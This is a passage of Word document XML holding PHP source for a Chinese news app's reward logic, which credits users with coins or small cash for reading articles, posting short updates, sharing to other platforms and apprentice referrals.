          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>篇文章可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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1231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135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2C3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D537D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news_s1'] &amp;&amp; $yaoqing['money_news_num']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271333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阅读</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$yaoqing['money_news_num'].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>篇文章奖励零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B19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like','%</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>徒弟阅读奖励零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>%']])-&gt;whereTime('time','today')-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069C1E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E5134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news_num'] &lt; $yaoqing['money_news_num']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C57F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Inc('news_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56939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79895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BA8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Field('news_num',0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F547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news_s1'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD43D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1B570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74A34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37FFB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68E42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14CC1D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96C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44ED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58E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D37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news'] &amp;&amp; $yaoqing['money_news_num']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714BF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阅读</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$yaoqing['money_news_num'].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>篇文章奖励金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA286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like','%</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>篇文章奖励金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>%']])-&gt;whereTime('time','today')-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18160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FADD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news_num'] &lt; $yaoqing['money_news_num']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C23A1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Inc('news_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFA4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59749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E6FC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Field('news_num',0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03789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news'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440D08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43025F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4D17C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25430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186AE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577FA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1CD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5BF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0463AC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ret)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE46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money.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','span'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>你今日已阅读</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$yaoqing['money_news_num'].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>篇文章</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;br&gt;'.$money.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币已放入你的账户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;br&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>明日再阅读</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$yaoqing['money_news_num'].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>篇文章可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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3D2D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129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49C9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D5B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37D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news_s1'] &amp;&amp; $yaoqing['money_news_num']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7B5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阅读</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$yaoqing['money_news_num'].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>篇文章奖励金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6282D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like','%</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>徒弟阅读</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>奖励金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>%']])-&gt;whereTime('time','today')-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50824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1232F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news_num'] &lt; $yaoqing['money_news_num']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEFE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Inc('news_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6755DC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3F6B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130E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gt;$uid])-&gt;setField('news_num',0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5225FC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news_s1'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16602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00B9D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73B0ED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65878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1B72A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17E85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E65E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CA72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C6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268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money_weitoutiao'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018300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weitoutiao']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BFE6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发布微头条零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F29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025875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699C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where(['uid'=&gt;$uid,'weitoutiao'=&gt;1,'hide'=&gt;1])-&gt;whereTime('create_time','today')-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A5C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70DA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31D5D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21E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weitoutiao'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77962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57B37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1BA30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57732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779D9B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7452D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270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F84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115238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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3D49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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>￥</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$money.'','span'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发布微头条奖励￥</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lt;br&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已放入你的零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;br&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>明天再发布微头条可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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3C7A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24E7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E23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54B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weitoutiao_s1']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0B6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发布微头条零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E83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1614ED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BED6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Db::name('article')-&gt;where(['uid'=&gt;$uid,'weitoutiao'=&gt;1,'hide'=&gt;1])-&gt;whereTime('create_time','today')-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCFC7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A2B3B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178C90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998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weitoutiao_s1'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC26F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7D44C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538596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46F38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07C3B6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7A4D5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6B7E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38C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5FD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E558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weitoutiao']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F883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发布微头条奖励金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47324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6FDCE4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8328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article')-&gt;where(['uid'=&gt;$uid,'weitoutiao'=&gt;1,'hide'=&gt;1])-&gt;whereTime('create_time','today')-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A10B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14196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C41C2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CCD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weitoutiao'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B944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038ED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191555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626F0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586711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05098F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D34A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E241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60F5BF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ret)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC09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money.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','span'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发布微头条奖励</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lt;br&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已放入你的账户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;br&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>明天再发布微头条可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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD07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4B7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E5B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B824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5F3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weitoutiao_s1']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D38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发布微头条金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAD7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697B83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2678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lastRenderedPageBreak/>
        <w:t>$db=Db::name('article')-&gt;where(['uid'=&gt;$uid,'weitoutiao'=&gt;1,'hide'=&gt;1])-&gt;whereTime('create_time','today')-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194EC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EA6E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48AF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51B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weitoutiao_s1'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31922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50189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596BA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12FA59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29481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4ED73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598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E70D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F9B9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88D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money_fenxiang_1'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536E54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fenxiang_1']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB8D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师徒分享第三方平台奖励零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDEC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0FE9E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B4B10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fenxiang_1'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B9FC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5F29D0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62303F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70112B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5DCD4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28177E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4DD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44E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67323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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCF4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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>￥</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$money.'','span'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分享平台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lt;br&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已放入你的零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;br&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>明天再分享可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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A960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3B9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35C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DAF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fenxiang_1_s1']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614350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分享师徒第三方平台奖励零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6EDB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2DF8BC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A6F5E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fenxiang_1_s1'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7D1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2223D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543B5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03BC6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6D7C9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60553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030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44F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443F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5B3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fenxiang_1']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B810F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师徒分享第三方平台奖励金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51463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0D0F6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22B3F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fenxiang_1'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5D2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07441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5A5756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63A19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483B3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235D82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73EB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0B4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5BC95C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ret)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F49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money.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','span'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分享平台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lt;br&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已放入你的账户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;br&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>明天再分享可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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01903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0DA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447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10B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324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fenxiang_1_s1']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632A99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分享师徒第三方平台奖励金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745ED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763573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BA92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fenxiang_1_s1'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240A38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3718C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4BB7B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6304D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4B617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755A8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F9A7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A70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95CC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C20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money_fenxiang_2'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EBA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fenxiang_2']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE6E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文章分享第三方平台奖励零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686A7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57FBF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7485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fenxiang_2'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C90D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4AE6B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11375D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140D6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oney'     =&gt;  $money*100,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C90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78CF0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5AF3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3383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2940BD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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AAD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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>￥</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$money.'','span'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文章分享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lt;br&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已放入你的零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;br&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>明天再分享可获得￥</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$money.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C637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176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7810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205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fenxiang_2_s1']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53784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文章分享第三方平台奖励零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48683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value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62317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1E19D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money_fenxiang_2_s1'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D1FF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7342B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62537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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DFB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3F3A3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3753CC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C9E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81F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5C4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717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fenxiang_2']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5213B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文章分享第三方平台奖励金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592A3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value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435537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74FE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fenxiang_2'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE7C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498EA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018682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2047E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02CD9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2518EF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A6E7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15CF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4DC88D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ret)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E72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h1'=&gt;''.$money.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','span'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文章分享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lt;br&gt;</w:t>
